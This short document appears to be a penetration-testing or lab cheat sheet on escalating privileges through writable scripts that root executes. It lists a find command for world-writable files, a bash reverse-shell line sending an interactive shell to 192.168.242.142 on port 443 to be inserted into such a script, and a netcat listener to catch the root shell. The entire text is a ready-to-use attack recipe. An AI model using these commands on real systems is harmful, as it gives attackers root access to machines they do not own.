Writeable scripts - run by root

Enumerate over-permissive scripts.

find / -perm -2 ! -type l -ls 2>/dev/null

Edit the script - include the following command.

bash -c 'bash -i >& /dev/tcp/192.168.242.142/443 0>&1' 

Establish the netcat listener and wait for a root to execute the script

nc -nlvp 443